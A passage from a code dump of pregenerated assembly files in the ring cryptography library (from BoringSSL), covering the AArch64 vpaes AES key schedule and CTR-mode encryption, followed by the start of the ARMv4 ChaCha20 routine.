eor v4.16b, v4.16b, v5.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
eor v12.16b, v12.16b, v13.16b
tbl v2.16b, {v18.16b},v3.16b // vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
tbl v10.16b, {v18.16b},v11.16b
tbl v3.16b, {v18.16b},v4.16b // vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
tbl v11.16b, {v18.16b},v12.16b
eor v2.16b, v2.16b, v1.16b // vpxor %xmm1, %xmm2, %xmm2 # 2 = io
eor v10.16b, v10.16b, v9.16b
eor v3.16b, v3.16b, v0.16b // vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
eor v11.16b, v11.16b, v8.16b
ld1 {v16.2d}, [x9],#16 // vmovdqu (%r9), %xmm5
cbnz w8, .Lenc_2x_loop
// middle of last round
add x10, x11, #0x80
// vmovdqa -0x60(%r10), %xmm4 # 3 : sbou .Lk_sbo
// vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
tbl v4.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
tbl v12.16b, {v22.16b}, v10.16b
ld1 {v1.2d}, [x10] // vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
tbl v0.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
tbl v8.16b, {v23.16b}, v11.16b
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v12.16b, v12.16b, v16.16b
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
eor v8.16b, v8.16b, v12.16b
tbl v0.16b, {v0.16b},v1.16b // vpshufb %xmm1, %xmm0, %xmm0
tbl v1.16b, {v8.16b},v1.16b
ret
.size _vpaes_encrypt_2x,.-_vpaes_encrypt_2x
########################################################
## ##
## AES key schedule ##
## ##
########################################################
.type _vpaes_key_preheat,%function
.align 4
_vpaes_key_preheat:
adrp x10, .Lk_inv
add x10, x10, :lo12:.Lk_inv
movi v16.16b, #0x5b // .Lk_s63
adrp x11, .Lk_sb1
add x11, x11, :lo12:.Lk_sb1
movi v17.16b, #0x0f // .Lk_s0F
ld1 {v18.2d,v19.2d,v20.2d,v21.2d}, [x10] // .Lk_inv, .Lk_ipt
adrp x10, .Lk_dksd
add x10, x10, :lo12:.Lk_dksd
ld1 {v22.2d,v23.2d}, [x11] // .Lk_sb1
adrp x11, .Lk_mc_forward
add x11, x11, :lo12:.Lk_mc_forward
ld1 {v24.2d,v25.2d,v26.2d,v27.2d}, [x10],#64 // .Lk_dksd, .Lk_dksb
ld1 {v28.2d,v29.2d,v30.2d,v31.2d}, [x10],#64 // .Lk_dkse, .Lk_dks9
ld1 {v8.2d}, [x10] // .Lk_rcon
ld1 {v9.2d}, [x11] // .Lk_mc_forward[0]
ret
.size _vpaes_key_preheat,.-_vpaes_key_preheat
.type _vpaes_schedule_core,%function
.align 4
_vpaes_schedule_core:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp,#-16]!
add x29,sp,#0
bl _vpaes_key_preheat // load the tables
ld1 {v0.16b}, [x0],#16 // vmovdqu (%rdi), %xmm0 # load key (unaligned)
// input transform
mov v3.16b, v0.16b // vmovdqa %xmm0, %xmm3
bl _vpaes_schedule_transform
mov v7.16b, v0.16b // vmovdqa %xmm0, %xmm7
adrp x10, .Lk_sr // lea .Lk_sr(%rip),%r10
add x10, x10, :lo12:.Lk_sr
add x8, x8, x10
// encrypting, output zeroth round key after transform
st1 {v0.2d}, [x2] // vmovdqu %xmm0, (%rdx)
cmp w1, #192 // cmp $192, %esi
b.hi .Lschedule_256
b.eq .Lschedule_192
// 128: fall though
##
## .schedule_128
##
## 128-bit specific part of key schedule.
##
## This schedule is really simple, because all its parts
## are accomplished by the subroutines.
##
.Lschedule_128:
mov x0, #10 // mov $10, %esi
.Loop_schedule_128:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle // write output
b .Loop_schedule_128
##
## .aes_schedule_192
##
## 192-bit specific part of key schedule.
##
## The main body of this schedule is the same as the 128-bit
## schedule, but with more smearing. The long, high side is
## stored in %xmm7 as before, and the short, low side is in
## the high bits of %xmm6.
##
## This schedule is somewhat nastier, however, because each
## round produces 192 bits of key material, or 1.5 round keys.
## Therefore, on each cycle we do 2 rounds and produce 3 round
## keys.
##
.align 4
.Lschedule_192:
sub x0, x0, #8
ld1 {v0.16b}, [x0] // vmovdqu 8(%rdi),%xmm0 # load key part 2 (very unaligned)
bl _vpaes_schedule_transform // input transform
mov v6.16b, v0.16b // vmovdqa %xmm0, %xmm6 # save short part
eor v4.16b, v4.16b, v4.16b // vpxor %xmm4, %xmm4, %xmm4 # clear 4
ins v6.d[0], v4.d[0] // vmovhlps %xmm4, %xmm6, %xmm6 # clobber low side with zeros
mov x0, #4 // mov $4, %esi
.Loop_schedule_192:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_round
ext v0.16b, v6.16b, v0.16b, #8 // vpalignr $8,%xmm6,%xmm0,%xmm0
bl _vpaes_schedule_mangle // save key n
bl _vpaes_schedule_192_smear
bl _vpaes_schedule_mangle // save key n+1
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle // save key n+2
bl _vpaes_schedule_192_smear
b .Loop_schedule_192
##
## .aes_schedule_256
##
## 256-bit specific part of key schedule.
##
## The structure here is very similar to the 128-bit
## schedule, but with an additional "low side" in
## %xmm6. The low side's rounds are the same as the
## high side's, except no rcon and no rotation.
##
.align 4
.Lschedule_256:
ld1 {v0.16b}, [x0] // vmovdqu 16(%rdi),%xmm0 # load key part 2 (unaligned)
bl _vpaes_schedule_transform // input transform
mov x0, #7 // mov $7, %esi
.Loop_schedule_256:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_mangle // output low result
mov v6.16b, v0.16b // vmovdqa %xmm0, %xmm6 # save cur_lo in xmm6
// high round
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle
// low round. swap xmm7 and xmm6
dup v0.4s, v0.s[3] // vpshufd $0xFF, %xmm0, %xmm0
movi v4.16b, #0
mov v5.16b, v7.16b // vmovdqa %xmm7, %xmm5
mov v7.16b, v6.16b // vmovdqa %xmm6, %xmm7
bl _vpaes_schedule_low_round
mov v7.16b, v5.16b // vmovdqa %xmm5, %xmm7
b .Loop_schedule_256
##
## .aes_schedule_mangle_last
##
## Mangler for last round of key schedule
## Mangles %xmm0
## when encrypting, outputs out(%xmm0) ^ 63
## when decrypting, outputs unskew(%xmm0)
##
## Always called right before return... jumps to cleanup and exits
##
.align 4
.Lschedule_mangle_last:
// schedule last round key from xmm0
adrp x11, .Lk_deskew // lea .Lk_deskew(%rip),%r11 # prepare to deskew
add x11, x11, :lo12:.Lk_deskew
cbnz w3, .Lschedule_mangle_last_dec
// encrypting
ld1 {v1.2d}, [x8] // vmovdqa (%r8,%r10),%xmm1
adrp x11, .Lk_opt // lea .Lk_opt(%rip), %r11 # prepare to output transform
add x11, x11, :lo12:.Lk_opt
add x2, x2, #32 // add $32, %rdx
tbl v0.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm0 # output permute
.Lschedule_mangle_last_dec:
ld1 {v20.2d,v21.2d}, [x11] // reload constants
sub x2, x2, #16 // add $-16, %rdx
eor v0.16b, v0.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm0, %xmm0
bl _vpaes_schedule_transform // output transform
st1 {v0.2d}, [x2] // vmovdqu %xmm0, (%rdx) # save last key
// cleanup
eor v0.16b, v0.16b, v0.16b // vpxor %xmm0, %xmm0, %xmm0
eor v1.16b, v1.16b, v1.16b // vpxor %xmm1, %xmm1, %xmm1
eor v2.16b, v2.16b, v2.16b // vpxor %xmm2, %xmm2, %xmm2
eor v3.16b, v3.16b, v3.16b // vpxor %xmm3, %xmm3, %xmm3
eor v4.16b, v4.16b, v4.16b // vpxor %xmm4, %xmm4, %xmm4
eor v5.16b, v5.16b, v5.16b // vpxor %xmm5, %xmm5, %xmm5
eor v6.16b, v6.16b, v6.16b // vpxor %xmm6, %xmm6, %xmm6
eor v7.16b, v7.16b, v7.16b // vpxor %xmm7, %xmm7, %xmm7
ldp x29, x30, [sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size _vpaes_schedule_core,.-_vpaes_schedule_core
##
## .aes_schedule_192_smear
##
## Smear the short, low side in the 192-bit key schedule.
##
## Inputs:
## %xmm7: high side, b a x y
## %xmm6: low side, d c 0 0
## %xmm13: 0
##
## Outputs:
## %xmm6: b+c+d b+c 0 0
## %xmm0: b+c+d b+c b a
##
.type _vpaes_schedule_192_smear,%function
.align 4
_vpaes_schedule_192_smear:
movi v1.16b, #0
dup v0.4s, v7.s[3]
ins v1.s[3], v6.s[2] // vpshufd $0x80, %xmm6, %xmm1 # d c 0 0 -> c 0 0 0
ins v0.s[0], v7.s[2] // vpshufd $0xFE, %xmm7, %xmm0 # b a _ _ -> b b b a
eor v6.16b, v6.16b, v1.16b // vpxor %xmm1, %xmm6, %xmm6 # -> c+d c 0 0
eor v1.16b, v1.16b, v1.16b // vpxor %xmm1, %xmm1, %xmm1
eor v6.16b, v6.16b, v0.16b // vpxor %xmm0, %xmm6, %xmm6 # -> b+c+d b+c b a
mov v0.16b, v6.16b // vmovdqa %xmm6, %xmm0
ins v6.d[0], v1.d[0] // vmovhlps %xmm1, %xmm6, %xmm6 # clobber low side with zeros
ret
.size _vpaes_schedule_192_smear,.-_vpaes_schedule_192_smear
##
## .aes_schedule_round
##
## Runs one main round of the key schedule on %xmm0, %xmm7
##
## Specifically, runs subbytes on the high dword of %xmm0
## then rotates it by one byte and xors into the low dword of
## %xmm7.
##
## Adds rcon from low byte of %xmm8, then rotates %xmm8 for
## next rcon.
##
## Smears the dwords of %xmm7 by xoring the low into the
## second low, result into third, result into highest.
##
## Returns results in %xmm7 = %xmm0.
## Clobbers %xmm1-%xmm4, %r11.
##
.type _vpaes_schedule_round,%function
.align 4
_vpaes_schedule_round:
// extract rcon from xmm8
movi v4.16b, #0 // vpxor %xmm4, %xmm4, %xmm4
ext v1.16b, v8.16b, v4.16b, #15 // vpalignr $15, %xmm8, %xmm4, %xmm1
ext v8.16b, v8.16b, v8.16b, #15 // vpalignr $15, %xmm8, %xmm8, %xmm8
eor v7.16b, v7.16b, v1.16b // vpxor %xmm1, %xmm7, %xmm7
// rotate
dup v0.4s, v0.s[3] // vpshufd $0xFF, %xmm0, %xmm0
ext v0.16b, v0.16b, v0.16b, #1 // vpalignr $1, %xmm0, %xmm0, %xmm0
// fall through...
// low round: same as high round, but no rotation and no rcon.
_vpaes_schedule_low_round:
// smear xmm7
ext v1.16b, v4.16b, v7.16b, #12 // vpslldq $4, %xmm7, %xmm1
eor v7.16b, v7.16b, v1.16b // vpxor %xmm1, %xmm7, %xmm7
ext v4.16b, v4.16b, v7.16b, #8 // vpslldq $8, %xmm7, %xmm4
// subbytes
and v1.16b, v0.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
eor v7.16b, v7.16b, v4.16b // vpxor %xmm4, %xmm7, %xmm7
tbl v2.16b, {v19.16b}, v1.16b // vpshufb %xmm1, %xmm11, %xmm2 # 2 = a/k
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
tbl v3.16b, {v18.16b}, v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
tbl v4.16b, {v18.16b}, v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
eor v7.16b, v7.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm7, %xmm7
tbl v3.16b, {v18.16b}, v3.16b // vpshufb %xmm3, %xmm10, %xmm3 # 2 = 1/iak
eor v4.16b, v4.16b, v2.16b // vpxor %xmm2, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
tbl v2.16b, {v18.16b}, v4.16b // vpshufb %xmm4, %xmm10, %xmm2 # 3 = 1/jak
eor v3.16b, v3.16b, v1.16b // vpxor %xmm1, %xmm3, %xmm3 # 2 = io
eor v2.16b, v2.16b, v0.16b // vpxor %xmm0, %xmm2, %xmm2 # 3 = jo
tbl v4.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm13, %xmm4 # 4 = sbou
tbl v1.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm12, %xmm1 # 0 = sb1t
eor v1.16b, v1.16b, v4.16b // vpxor %xmm4, %xmm1, %xmm1 # 0 = sbox output
// add in smeared stuff
eor v0.16b, v1.16b, v7.16b // vpxor %xmm7, %xmm1, %xmm0
eor v7.16b, v1.16b, v7.16b // vmovdqa %xmm0, %xmm7
ret
.size _vpaes_schedule_round,.-_vpaes_schedule_round
##
## .aes_schedule_transform
##
## Linear-transform %xmm0 according to tables at (%r11)
##
## Requires that %xmm9 = 0x0F0F... as in preheat
## Output in %xmm0
## Clobbers %xmm1, %xmm2
##
.type _vpaes_schedule_transform,%function
.align 4
_vpaes_schedule_transform:
and v1.16b, v0.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0
// vmovdqa (%r11), %xmm2 # lo
tbl v2.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm2
// vmovdqa 16(%r11), %xmm1 # hi
tbl v0.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm1, %xmm0
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
ret
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
##
## .aes_schedule_mangle
##
## Mangle xmm0 from (basis-transformed) standard version
## to our version.
##
## On encrypt,
## xor with 0x63
## multiply by circulant 0,1,1,1
## apply shiftrows transform
##
## On decrypt,
## xor with 0x63
## multiply by "inverse mixcolumns" circulant E,B,D,9
## deskew
## apply shiftrows transform
##
##
## Writes out to (%rdx), and increments or decrements it
## Keeps track of round number mod 4 in %r8
## Preserves xmm0
## Clobbers xmm1-xmm5
##
.type _vpaes_schedule_mangle,%function
.align 4
_vpaes_schedule_mangle:
mov v4.16b, v0.16b // vmovdqa %xmm0, %xmm4 # save xmm0 for later
// vmovdqa .Lk_mc_forward(%rip),%xmm5
// encrypting
eor v4.16b, v0.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm0, %xmm4
add x2, x2, #16 // add $16, %rdx
tbl v4.16b, {v4.16b}, v9.16b // vpshufb %xmm5, %xmm4, %xmm4
tbl v1.16b, {v4.16b}, v9.16b // vpshufb %xmm5, %xmm4, %xmm1
tbl v3.16b, {v1.16b}, v9.16b // vpshufb %xmm5, %xmm1, %xmm3
eor v4.16b, v4.16b, v1.16b // vpxor %xmm1, %xmm4, %xmm4
ld1 {v1.2d}, [x8] // vmovdqa (%r8,%r10), %xmm1
eor v3.16b, v3.16b, v4.16b // vpxor %xmm4, %xmm3, %xmm3
.Lschedule_mangle_both:
tbl v3.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm3
add x8, x8, #48 // add $-16, %r8
and x8, x8, #~(1<<6) // and $0x30, %r8
st1 {v3.2d}, [x2] // vmovdqu %xmm3, (%rdx)
ret
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,%function
.align 4
vpaes_set_encrypt_key:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
stp d8,d9,[sp,#-16]! // ABI spec says so
lsr w9, w1, #5 // shr $5,%eax
add w9, w9, #5 // $5,%eax
str w9, [x2,#240] // mov %eax,240(%rdx) # AES_KEY->rounds = nbits/32+5;
mov w3, #0 // mov $0,%ecx
mov x8, #0x30 // mov $0x30,%r8d
bl _vpaes_schedule_core
eor x0, x0, x0
ldp d8,d9,[sp],#16
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size vpaes_set_encrypt_key,.-vpaes_set_encrypt_key
.globl vpaes_ctr32_encrypt_blocks
.hidden vpaes_ctr32_encrypt_blocks
.type vpaes_ctr32_encrypt_blocks,%function
.align 4
vpaes_ctr32_encrypt_blocks:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
stp d8,d9,[sp,#-16]! // ABI spec says so
stp d10,d11,[sp,#-16]!
stp d12,d13,[sp,#-16]!
stp d14,d15,[sp,#-16]!
cbz x2, .Lctr32_done
// Note, unlike the other functions, x2 here is measured in blocks,
// not bytes.
mov x17, x2
mov x2, x3
// Load the IV and counter portion.
ldr w6, [x4, #12]
ld1 {v7.16b}, [x4]
bl _vpaes_encrypt_preheat
tst x17, #1
rev w6, w6 // The counter is big-endian.
b.eq .Lctr32_prep_loop
// Handle one block so the remaining block count is even for
// _vpaes_encrypt_2x.
ld1 {v6.16b}, [x0], #16 // .Load input ahead of time
bl _vpaes_encrypt_core
eor v0.16b, v0.16b, v6.16b // XOR input and result
st1 {v0.16b}, [x1], #16
subs x17, x17, #1
// Update the counter.
add w6, w6, #1
rev w7, w6
mov v7.s[3], w7
b.ls .Lctr32_done
.Lctr32_prep_loop:
// _vpaes_encrypt_core takes its input from v7, while _vpaes_encrypt_2x
// uses v14 and v15.
mov v15.16b, v7.16b
mov v14.16b, v7.16b
add w6, w6, #1
rev w7, w6
mov v15.s[3], w7
.Lctr32_loop:
ld1 {v6.16b,v7.16b}, [x0], #32 // .Load input ahead of time
bl _vpaes_encrypt_2x
eor v0.16b, v0.16b, v6.16b // XOR input and result
eor v1.16b, v1.16b, v7.16b // XOR input and result (#2)
st1 {v0.16b,v1.16b}, [x1], #32
subs x17, x17, #2
// Update the counter.
add w7, w6, #1
add w6, w6, #2
rev w7, w7
mov v14.s[3], w7
rev w7, w6
mov v15.s[3], w7
b.hi .Lctr32_loop
.Lctr32_done:
ldp d14,d15,[sp],#16
ldp d12,d13,[sp],#16
ldp d10,d11,[sp],#16
ldp d8,d9,[sp],#16
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size vpaes_ctr32_encrypt_blocks,.-vpaes_ctr32_encrypt_blocks
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 28,780 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/chacha-armv4-linux32.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
@ Silence ARMv8 deprecated IT instruction warnings. This file is used by both
@ ARMv7 and ARMv8 processors and does not use ARMv8 instructions.
.arch armv7-a
.text
#if defined(__thumb2__) || defined(__clang__)
.syntax unified
#endif
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
#if defined(__thumb2__) || defined(__clang__)
#define ldrhsb ldrbhs
#endif
.align 5
.Lsigma:
.long 0x61707865,0x3320646e,0x79622d32,0x6b206574 @ endian-neutral
.Lone:
.long 1,0,0,0
.globl ChaCha20_ctr32_nohw
.hidden ChaCha20_ctr32_nohw
.type ChaCha20_ctr32_nohw,%function
.align 5
ChaCha20_ctr32_nohw:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0,r1,r2,r4-r11,lr}
adr r14,.Lsigma
ldmia r12,{r4,r5,r6,r7} @ load counter and nonce
sub sp,sp,#4*(16) @ off-load area
stmdb sp!,{r4,r5,r6,r7} @ copy counter and nonce
ldmia r3,{r4,r5,r6,r7,r8,r9,r10,r11} @ load key
ldmia r14,{r0,r1,r2,r3} @ load sigma
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11} @ copy key
stmdb sp!,{r0,r1,r2,r3} @ copy sigma
str r10,[sp,#4*(16+10)] @ off-load "rx"
str r11,[sp,#4*(16+11)] @ off-load "rx"
b .Loop_outer_enter
.align 4
.Loop_outer:
ldmia sp,{r0,r1,r2,r3,r4,r5,r6,r7,r8,r9} @ load key material
str r11,[sp,#4*(32+2)] @ save len
str r12, [sp,#4*(32+1)] @ save inp
str r14, [sp,#4*(32+0)] @ save out
.Loop_outer_enter:
ldr r11, [sp,#4*(15)]
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
ldr r10, [sp,#4*(13)]
ldr r14,[sp,#4*(14)]
str r11, [sp,#4*(16+15)]
mov r11,#10
b .Loop
.align 4
.Loop:
subs r11,r11,#1
add r0,r0,r4
mov r12,r12,ror#16
add r1,r1,r5
mov r10,r10,ror#16
eor r12,r12,r0,ror#16
eor r10,r10,r1,ror#16
add r8,r8,r12
mov r4,r4,ror#20
add r9,r9,r10
mov r5,r5,ror#20
eor r4,r4,r8,ror#20
eor r5,r5,r9,ror#20
add r0,r0,r4
mov r12,r12,ror#24
add r1,r1,r5
mov r10,r10,ror#24
eor r12,r12,r0,ror#24
eor r10,r10,r1,ror#24
add r8,r8,r12
mov r4,r4,ror#25
add r9,r9,r10
mov r5,r5,ror#25
str r10,[sp,#4*(16+13)]
ldr r10,[sp,#4*(16+15)]
eor r4,r4,r8,ror#25
eor r5,r5,r9,ror#25
str r8,[sp,#4*(16+8)]
ldr r8,[sp,#4*(16+10)]
add r2,r2,r6
mov r14,r14,ror#16
str r9,[sp,#4*(16+9)]
ldr r9,[sp,#4*(16+11)]
add r3,r3,r7
mov r10,r10,ror#16
eor r14,r14,r2,ror#16
eor r10,r10,r3,ror#16
add r8,r8,r14
mov r6,r6,ror#20
add r9,r9,r10
mov r7,r7,ror#20
eor r6,r6,r8,ror#20
eor r7,r7,r9,ror#20
add r2,r2,r6
mov r14,r14,ror#24
add r3,r3,r7
mov r10,r10,ror#24
eor r14,r14,r2,ror#24
eor r10,r10,r3,ror#24
add r8,r8,r14
mov r6,r6,ror#25
add r9,r9,r10
mov r7,r7,ror#25
eor r6,r6,r8,ror#25
eor r7,r7,r9,ror#25
add r0,r0,r5
mov r10,r10,ror#16
add r1,r1,r6
mov r12,r12,ror#16
eor r10,r10,r0,ror#16
eor r12,r12,r1,ror#16
add r8,r8,r10
mov r5,r5,ror#20
add r9,r9,r12
mov r6,r6,ror#20
eor r5,r5,r8,ror#20
eor r6,r6,r9,ror#20
add r0,r0,r5
mov r10,r10,ror#24
add r1,r1,r6
mov r12,r12,ror#24
eor r10,r10,r0,ror#24
eor r12,r12,r1,ror#24
add r8,r8,r10
mov r5,r5,ror#25
str r10,[sp,#4*(16+15)]
ldr r10,[sp,#4*(16+13)]
add r9,r9,r12
mov r6,r6,ror#25
eor r5,r5,r8,ror#25
eor r6,r6,r9,ror#25
str r8,[sp,#4*(16+10)]
ldr r8,[sp,#4*(16+8)]
add r2,r2,r7
mov r10,r10,ror#16
str r9,[sp,#4*(16+11)]
ldr r9,[sp,#4*(16+9)]
add r3,r3,r4
mov r14,r14,ror#16
eor r10,r10,r2,ror#16
eor r14,r14,r3,ror#16
add r8,r8,r10
mov r7,r7,ror#20
add r9,r9,r14
mov r4,r4,ror#20
eor r7,r7,r8,ror#20
eor r4,r4,r9,ror#20
add r2,r2,r7
mov r10,r10,ror#24
add r3,r3,r4
mov r14,r14,ror#24
eor r10,r10,r2,ror#24
eor r14,r14,r3,ror#24
add r8,r8,r10
mov r7,r7,ror#25
add r9,r9,r14
mov r4,r4,ror#25
eor r7,r7,r8,ror#25
eor r4,r4,r9,ror#25
bne .Loop
ldr r11,[sp,#4*(32+2)] @ load len
str r8, [sp,#4*(16+8)] @ modulo-scheduled store
str r9, [sp,#4*(16+9)]
str r12,[sp,#4*(16+12)]
str r10, [sp,#4*(16+13)]
str r14,[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ rx and second half at sp+4*(16+8)
cmp r11,#64 @ done yet?
#ifdef __thumb2__
itete lo
#endif
addlo r12,sp,#4*(0) @ shortcut or ...
ldrhs r12,[sp,#4*(32+1)] @ ... load inp
addlo r14,sp,#4*(0) @ shortcut or ...
ldrhs r14,[sp,#4*(32+0)] @ ... load out
ldr r8,[sp,#4*(0)] @ load key material
ldr r9,[sp,#4*(1)]
#if __ARM_ARCH>=6 || !defined(__ARMEB__)
# if __ARM_ARCH<7
orr r10,r12,r14
tst r10,#3 @ are input and output aligned?
ldr r10,[sp,#4*(2)]
bne .Lunaligned
cmp r11,#64 @ restore flags
# else
ldr r10,[sp,#4*(2)]
# endif
ldr r11,[sp,#4*(3)]
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r2,r2,r10
add r3,r3,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r0,r0,r8 @ xor with input
eorhs r1,r1,r9
add r8,sp,#4*(4)
str r0,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r2,r2,r10
eorhs r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r1,[r14,#-12]
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r6,r6,r10
add r7,r7,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r4,r4,r8
eorhs r5,r5,r9
add r8,sp,#4*(8)
str r4,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r6,r6,r10
eorhs r7,r7,r11
str r5,[r14,#-12]
ldmia r8,{r8,r9,r10,r11} @ load key material
str r6,[r14,#-8]
add r0,sp,#4*(16+8)
str r7,[r14,#-4]
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
# ifdef __thumb2__
itt hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx" while at it
strhi r11,[sp,#4*(16+11)] @ copy "rx" while at it
add r2,r2,r10
add r3,r3,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r0,r0,r8
eorhs r1,r1,r9
add r8,sp,#4*(12)
str r0,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r2,r2,r10
eorhs r3,r3,r11
str r1,[r14,#-12]
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
# ifdef __thumb2__
itt hi
# endif
addhi r8,r8,#1 @ next counter value
strhi r8,[sp,#4*(12)] @ save next counter value
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r6,r6,r10
add r7,r7,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r4,r4,r8
eorhs r5,r5,r9
# ifdef __thumb2__
it ne
# endif
ldrne r8,[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
itt hs
# endif
eorhs r6,r6,r10
eorhs r7,r7,r11
str r4,[r14],#16 @ store output
str r5,[r14,#-12]
# ifdef __thumb2__
it hs
# endif
subhs r11,r8,#64 @ len-=64
str r6,[r14,#-8]
str r7,[r14,#-4]
bhi .Loop_outer
beq .Ldone
# if __ARM_ARCH<7
b .Ltail
.align 4
.Lunaligned:@ unaligned endian-neutral path
cmp r11,#64 @ restore flags
# endif
#endif
#if __ARM_ARCH<7
ldr r11,[sp,#4*(3)]
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
add r2,r2,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r3,r3,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r0,r8,r0 @ xor with input (or zero)
eor r1,r9,r1
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r2,r10,r2
strb r0,[r14],#16 @ store output
eor r3,r11,r3
# ifdef __thumb2__
